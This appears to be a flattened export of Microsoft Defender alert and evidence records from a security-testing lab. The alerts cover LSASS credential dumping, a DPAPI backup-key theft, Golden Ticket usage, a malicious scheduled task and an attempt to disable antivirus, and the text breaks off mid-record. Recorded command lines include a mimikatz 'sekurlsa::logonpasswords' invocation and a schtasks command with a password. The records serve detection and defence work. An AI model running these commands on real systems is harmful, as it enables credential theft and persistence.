"url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:36:18.9733333Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:33:42.4457797Z", "processId": 9656, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:36:19.78Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:33:21.1761631Z", "processId": 7748, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638037518549951922_-2044684283
e46fcd28-d937-4252-b10a-91c5292c21d0
686
MicrosoftDefenderForEndpoint
2022-11-11T08:24:14.995216Z
2022-11-12T01:35:43.1766667Z
2022-11-12T01:35:42.84Z
2022-11-11T08:21:30.0941332Z
2022-11-11T08:21:30.0941332Z
Password hashes dumped from LSASS memory
LSASS process memory has been read to obtain password hashes, indicating possible credential theft. Attackers can use hashes obtained from LSASS process memory to impersonate or perform actions on behalf of logged on or recently logged on users.
CredentialAccess
Resolved
Medium
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
2ed33edd-2c33-49fd-877b-ab73fba14d59
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003", "T1003.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Medium", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:24:15.04Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:24:15.04Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4704, "processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit", "processCreationTime": "2022-11-11T08:17:06.3382251Z", "processId": 6044, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:24:15.04Z", "fileName": "lsass.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:06:09.0096674Z", "parentProcessFileName": "wininit.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32", "parentProcessId": 532, "processCommandLine": "lsass.exe", "processCreationTime": "2022-11-10T07:06:09.0866649Z", "processId": 624, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "0fb26350106c9bdd196d4e7d01eb30007663687c", "sha256": "bbc83e4759d4b82bad31e371ad679aa414c72273bf97cee5aed8337ed8a4d79f", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T05:22:11.45Z
Suspicious
None
null
null
null
null
null
null
null
null
null
0
cmd.exe /c whoami
0001-01-01T00:00:00Z
0
0001-01-01T00:00:00Z
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2023-01-24T05:33:51.7933333Z
Unknown
None
User1
DIYTESTMACHINE
S-1-5-21-4215714199-1288013905-3478400915-1002
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T13:49:30.22Z
Unknown
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:20:34.2166667Z
Suspicious
None
operator
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:10:38.28Z
Malicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T21:05:00.86Z
Suspicious
None
user1
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
aae5ffbe12-5736-4395-a65d-c3cd5abe123d
e5ffbe12-5736-4395-a65d-c3cd5abe123d
486
MicrosoftDefenderForIdentity
2022-09-30T06:19:24.0081445Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:13:05.450731Z
2022-09-30T06:13:06.002008Z
Malicious request of Data Protection API (DPAPI) master key
Steve Lewis (IT director) on MSDXV2-Win10V successfully obtained the DPAPI domain backup key from MSDXV2-DC.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
AzureATP
RetrieveDataProtectionBackupKeySecurityAlert
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1555", "T1555.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "WindowsServer2019", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e" } }, { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-09-30T06:19:24.1733333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T21:06:13.4366667Z
Unknown
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:48:46.78Z
Suspicious
None
jeff
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
b97761358338e640a31eef5e5c5773b633890914
57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4
PsExec.exe
C:\M365DAttack\PsTools
3,956
whoami /all
2022-12-22T08:47:29.7154534Z
6,584
2022-12-22T08:47:29.1097133Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2023-01-24T05:33:51.7933333Z
Malicious
Active
User1
DIYTESTMACHINE
S-1-5-21-4215714199-1288013905-3478400915-1002
null
null
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
4,136
powershell "mv C:\Users\administrator1\Desktop\SharedFolder\payload C:\Users\administrator1\Desktop\SharedFolder\payload.ps1"
2023-01-24T05:30:53.6695902Z
3,436
2023-01-24T05:30:53.3526726Z
cmd.exe
C:\Windows\System32
Detected
302293d9f276eae65553e5042156bce93cbc7148
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:36:07.8466667Z
Suspicious
None
guest
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1107
0808dea1-2ec8-41d2-8e3e-7c18309fab09
steve@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072982373210702_507162902
5e151cb8-8be1-4c23-9ee4-ca4eb1337686
975
MicrosoftDefenderForEndpoint
2022-12-22T09:30:37.3210927Z
2022-12-22T09:30:38.0733333Z
null
2022-12-22T09:26:42.4807406Z
2022-12-22T09:26:54.5015631Z
Suspicious Scheduled Task Process Launched
A scheduled task pointing to a malicious file or a suspicious command line was launched on this device. Attackers often use scheduled tasks to automatically run malicious code and establish persistence.
Execution
New
Medium
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
0fe2168f-ddd9-4d50-81fc-c05d224c86de
null
null
null
[ "T1053.002", "T1053.005" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "staging.net", "firstSeen": "2022-12-08T05:21:19.944Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV8" } ], "mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "1809", "vmMetadata": null } ]
[ { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T09:30:37.3433333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": "MSDXV8", "entityType": "Process", "evidenceCreationTime": "2022-12-22T09:30:37.3433333Z", "fileName": "schtasks.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T09:07:41.4690585Z", "parentProcessFileName": "powershell_ise.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 5408, "processCommandLine": "\"schtasks.exe\" /CREATE /RU MSDXV8\\RonHD /RP FightingTiger$ /SC DAILY /TN Execute-Notepad.536456477.2022-12-22_09_26_42 /TR C:\\Windows\\system32\\notepad.exe /ST 00:00:00 /F", "processCreationTime": "2022-12-22T09:26:42.0786601Z", "processId": 6868, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "ef95ff34f5eb7a36e4dba9d7957811caf738ef53", "sha256": "812ccfa2d234ef9989e1730976dd8217d0f3107fbd92244454a5fb735051b8db", "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "RonHD", "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": "MSDXV8", "entityType": "Process", "evidenceCreationTime": "2022-12-22T09:30:37.3433333Z", "fileName": "notepad.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:52:54.2687409Z", "parentProcessFileName": "svchost.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 1296, "processCommandLine": "notepad.exe", "processCreationTime": "2022-12-22T09:26:54.3892807Z", "processId": 6444, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "5be67dad56e33cdbd1c327948ee70d43e69ed106", "sha256": "a28438e1388f272a52559536d99d65ba15b1a8288be1200e249851fdf7ee6c7e", "url": null, "userPrincipalName": "ronhd@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-12-22T09:30:37.3433333Z", "fileName": "svchost.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:52:53.3853091Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 680, "processCommandLine": "svchost.exe -k netsvcs -p -s Schedule", "processCreationTime": "2022-12-22T08:52:54.2687409Z", "processId": 1296, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "a1385ce20ad79f55df235effd9780c31442aa234", "sha256": "7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "RonHD", "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": "MSDXV8", "entityType": "Process", "evidenceCreationTime": "2022-12-22T09:30:37.47Z", "fileName": "notepad.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:52:54.2687409Z", "parentProcessFileName": "svchost.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 1296, "processCommandLine": "notepad.exe", "processCreationTime": "2022-12-22T09:26:42.7815499Z", "processId": 6796, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "5be67dad56e33cdbd1c327948ee70d43e69ed106", "sha256": "a28438e1388f272a52559536d99d65ba15b1a8288be1200e249851fdf7ee6c7e", "url": null, "userPrincipalName": "ronhd@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1111", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:03:39.6566667Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
10,732
netstat -an
2022-11-21T02:01:38.0862456Z
11,068
2022-11-21T02:01:28.4753286Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
aa6d258135-ce7c-43ee-9913-8676dcb64961
6d258135-ce7c-43ee-9913-8676dcb64961
486
MicrosoftDefenderForIdentity
2022-09-30T06:19:35.1332952Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-07T09:25:00Z
2022-09-30T07:27:00.624237Z
Suspected Golden Ticket usage (time anomaly)
Steve Lewis (IT director) used a Kerberos ticket from MSDXV2-Win10V to access 3 resources, exceeding the maximum lifetime for user ticket.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
AzureATP
GoldenTicketSecurityAlert
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1558", "T1558.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "internal.corp", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } }, { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "internal.corp", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Semi Auto Client", "riskScore": "High", "tags": [ "semi auto" ], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66" } }, { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "internal.corp", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "WindowsServer2019", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e" } } ]
[ { "aadUserId": null, "accountName": "krbtgt", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "User", "evidenceCreationTime": "2022-09-30T06:19:35.2Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-502", "verdict": "5" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-09-30T06:19:35.2Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638041865105979370_382804972
25d9dfec-e488-44ad-b1dd-472b4578a73a
730
MicrosoftDefenderForEndpoint
2022-11-16T09:08:30.5979613Z
2022-11-19T01:35:44.2066667Z
2022-11-19T01:35:44.1866667Z
2022-11-16T09:05:41.3077996Z
2022-11-16T09:05:41.3077996Z
Attempt to turn off Microsoft Defender Antivirus protection
An attempt was made to turn off a protection feature in Microsoft Defender Antivirus. An attacker might be trying to evade detection.
DefenseEvasion
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
ac5d5f4f-fab6-41d4-b1b0-552f3c51cea1
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1562.001" ]
[ { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "steve", "domainName": "MSDXV2" } ], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Semi Auto Client", "riskScore": "Critical", "tags": [ "semi auto" ], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66" } } ]
[ { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": null, "deviceId": null, "domainName": "NT AUTHORITY", "entityType": "User", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": "AntiVirus.psm1", "filePath": "C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "59f430a85fe692483ea73cd4338d7a1f4dbce5af", "sha256": "1c0f9c9177787b3146332dd0f112444d3062214f6e71e1a4bc16b1fb55818a86", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T09:04:31.5834723Z", "parentProcessFileName": "SenseCM.exe", "parentProcessFilePath": "C:\\Program Files\\Windows Defender Advanced Threat Protection", "parentProcessId": 7224, "processCommandLine": "powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command \"& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = 